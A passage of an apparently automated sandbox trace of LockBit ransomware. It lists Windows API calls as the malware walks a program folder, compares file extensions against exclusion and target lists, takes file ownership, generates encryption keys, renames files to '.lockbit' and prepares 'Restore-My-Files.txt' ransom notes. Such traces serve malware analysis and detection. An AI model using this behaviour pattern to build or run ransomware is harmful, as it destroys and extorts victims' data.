(lpString1=".db-wal", lpString2=".png") returned -1 [0092.816] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0092.816] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0092.816] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0092.816] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0092.816] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0092.816] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0092.816] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0092.816] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0092.816] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0092.816] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0092.816] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0092.816] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0092.816] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0092.816] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0092.816] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0092.816] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0092.816] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0092.816] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0092.816] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0092.816] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0092.816] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-bullet.png.lockbit") returned 77 [0092.816] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-bullet.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\button-bullet.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0092.819] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0092.820] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0092.821] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0092.822] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0092.824] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0092.824] RtlFreeAnsiString (AnsiString="\\") [0092.824] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x13dc) returned 0x0 [0092.824] malloc (_Size=0x200) returned 0x77d800 [0092.824] NtQueryInformationToken (in: TokenHandle=0x13dc, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0092.824] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0092.824] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0092.824] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-bullet.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0092.825] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-bullet.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0092.825] CloseHandle (hObject=0x13dc) returned 1 [0092.825] free (_Block=0x77d800) [0092.825] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-bullet.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\button-bullet.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13dc [0092.826] CreateIoCompletionPort (FileHandle=0x13dc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0092.826] malloc (_Size=0x40068) returned 0x1ff1e60 [0092.826] GetFileSizeEx (in: hFile=0x13dc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=962) returned 1 [0092.826] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.829] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.829] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0092.829] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.833] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.833] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0092.833] ReadFile (in: hFile=0x13dc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0092.835] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-bullet.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-bullet.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0092.835] malloc (_Size=0xb0) returned 0x77d800 [0092.835] NtSetInformationFile (FileHandle=0x13dc, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xb0, FileInformationClass=0xa) returned 0x0 [0092.836] free (_Block=0x77d800) [0092.836] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-bullet.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel") returned 1 [0092.836] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Restore-My-Files.txt") returned 72 [0092.836] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0092.836] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x726b5d16, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x726b5d16, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x553e929b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="button-highlight.png", cAlternateFileName="")) returned 1 [0092.836] lstrcmpiW (lpString1=".", lpString2="button-highlight.png") returned -1 [0092.836] lstrcmpiW (lpString1="..", lpString2="button-highlight.png") returned -1 [0092.836] PathFindExtensionW (pszPath="button-highlight.png") returned=".png" [0092.836] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0092.836] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0092.837] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0092.837] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0092.837] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0092.837] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0092.837] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0092.837] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0092.837] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0092.837] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0092.837] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0092.837] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0092.837] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0092.837] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0092.837] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0092.837] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0092.837] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0092.837] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0092.837] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0092.837] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0092.837] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0092.838] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0092.838] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0092.838] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0092.838] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0092.838] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0092.838] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0092.838] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0092.838] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0092.838] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0092.838] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0092.838] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0092.838] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0092.838] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0092.838] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0092.838] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0092.838] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0092.838] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0092.838] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0092.838] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0092.838] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0092.838] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0092.838] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0092.839] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0092.839] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0092.839] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0092.839] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0092.839] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="button-highlight.png") returned 1 [0092.839] lstrcmpiW (lpString1="ntldr", lpString2="button-highlight.png") returned 1 [0092.839] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="button-highlight.png") returned 1 [0092.839] lstrcmpiW (lpString1="bootsect.bak", lpString2="button-highlight.png") returned -1 [0092.839] lstrcmpiW (lpString1="autorun.inf", lpString2="button-highlight.png") returned -1 [0092.839] lstrcmpiW (lpString1="thumbs.db", lpString2="button-highlight.png") returned 1 [0092.839] lstrcmpiW (lpString1="iconcache.db", lpString2="button-highlight.png") returned 1 [0092.839] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\") returned="" [0092.839] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-highlight.png") returned=".png" [0092.839] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0092.839] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0092.839] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0092.839] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0092.839] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0092.839] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0092.840] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0092.840] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0092.840] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0092.840] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0092.840] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0092.840] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0092.840] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0092.840] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0092.840] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0092.840] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0092.840] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0092.840] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0092.840] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0092.840] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0092.840] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0092.840] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0092.840] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0092.840] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0092.840] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0092.840] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0092.841] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0092.841] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0092.841] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-highlight.png.lockbit") returned 80 [0092.841] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\button-highlight.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0092.843] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0092.846] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0092.846] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0092.848] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0092.851] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0092.851] RtlFreeAnsiString (AnsiString="\\") [0092.851] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x13d8) returned 0x0 [0092.851] malloc (_Size=0x200) returned 0x77d800 [0092.851] NtQueryInformationToken (in: TokenHandle=0x13d8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0092.851] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0092.851] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0092.851] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-highlight.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0092.852] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-highlight.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0092.852] CloseHandle (hObject=0x13d8) returned 1 [0092.852] free (_Block=0x77d800) [0092.853] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\button-highlight.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13d8 [0092.853] CreateIoCompletionPort (FileHandle=0x13d8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0092.853] malloc (_Size=0x40068) returned 0x3df0008 [0092.853] GetFileSizeEx (in: hFile=0x13d8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=716) returned 1 [0092.853] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.857] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.857] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0092.858] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.861] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.861] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0092.861] ReadFile (in: hFile=0x13d8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0092.871] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-highlight.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-highlight.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0092.871] malloc (_Size=0xb6) returned 0x77d800 [0092.871] NtSetInformationFile (FileHandle=0x13d8, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xb6, FileInformationClass=0xa) returned 0x0 [0092.872] free (_Block=0x77d800) [0092.872] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-highlight.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel") returned 1 [0092.872] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Restore-My-Files.txt") returned 72 [0092.872] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0092.872] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x726dbe73, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x726dbe73, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5540f3f9, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x47c1d, dwReserved0=0x0, dwReserved1=0x0, cFileName="content-background.png", cAlternateFileName="")) returned 1 [0092.872] lstrcmpiW (lpString1=".", lpString2="content-background.png") returned -1 [0092.872] lstrcmpiW (lpString1="..", lpString2="content-background.png") returned -1 [0092.872] PathFindExtensionW (pszPath="content-background.png") returned=".png" [0092.872] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0092.872] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0092.872] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0092.872] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0092.872] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0092.873] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0092.873] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0092.873] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0092.873] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0092.873] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0092.873] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0092.873] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0092.873] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0092.873] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0092.873] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0092.873] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0092.873] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0092.873] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0092.873] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0092.873] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0092.873] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0092.873] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0092.874] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0092.874] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0092.874] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0092.874] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0092.874] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0092.874] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0092.874] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0092.874] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0092.874] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0092.874] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0092.874] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0092.874] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0092.874] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0092.874] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0092.874] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0092.874] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0092.874] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0092.874] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0092.874] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0092.874] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0092.874] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0092.875] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0092.875] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0092.875] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0092.875] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0092.875] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="content-background.png") returned 1 [0092.875] lstrcmpiW (lpString1="ntldr", lpString2="content-background.png") returned 1 [0092.875] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="content-background.png") returned 1 [0092.875] lstrcmpiW (lpString1="bootsect.bak", lpString2="content-background.png") returned -1 [0092.875] lstrcmpiW (lpString1="autorun.inf", lpString2="content-background.png") returned -1 [0092.875] lstrcmpiW (lpString1="thumbs.db", lpString2="content-background.png") returned 1 [0092.875] lstrcmpiW (lpString1="iconcache.db", lpString2="content-background.png") returned 1 [0092.875] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\") returned="" [0092.875] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\content-background.png") returned=".png" [0092.875] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0092.875] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0092.875] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0092.875] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0092.875] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0092.875] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0092.875] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0092.876] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0092.876] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0092.876] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0092.876] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0092.876] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0092.876] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0092.876] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0092.876] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0092.876] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0092.876] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0092.876] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0092.876] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0092.876] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0092.876] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0092.876] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0092.876] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0092.876] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0092.876] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0092.876] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0092.876] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0092.877] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0092.877] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\content-background.png.lockbit") returned 82 [0092.877] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\content-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\content-background.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0092.887] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0092.889] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0092.889] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0092.890] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 